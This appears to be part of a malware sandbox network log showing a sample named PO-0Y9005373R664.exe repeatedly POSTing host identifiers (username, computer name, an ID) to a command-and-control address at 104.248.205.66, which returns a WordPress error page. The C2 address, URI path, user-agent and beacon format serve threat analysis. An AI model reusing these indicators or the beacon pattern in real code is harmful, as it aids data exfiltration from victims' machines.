Aug 29, 2024 12:03:24.159693003 CEST	224	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
Aug 29, 2024 12:03:24.159703016 CEST	1236	IN	Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
Aug 29, 2024 12:03:24.159714937 CEST	142	IN	Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49733	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:24.310172081 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:24.315193892 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:26.573676109 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:24 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:26.573699951 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:26.573713064 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49734	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:26.715199947 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:26.720005035 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:29.124326944 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:27 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:29.124345064 CEST	224	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
Aug 29, 2024 12:03:29.124352932 CEST	1236	IN	Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
Aug 29, 2024 12:03:29.124366045 CEST	142	IN	Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49735	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:29.277251005 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:29.282131910 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:31.572973967 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:29 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:31.572997093 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:31.573010921 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49736	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:31.845665932 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:31.850642920 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:34.162789106 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:32 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:34.162826061 CEST	224	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
Aug 29, 2024 12:03:34.162837982 CEST	1236	IN	Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
Aug 29, 2024 12:03:34.162854910 CEST	142	IN	Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49737	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:34.478476048 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:34.483481884 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:37.353600979 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:35 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:37.353660107 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:37.353672028 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49738	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:37.498574018 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:37.503478050 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
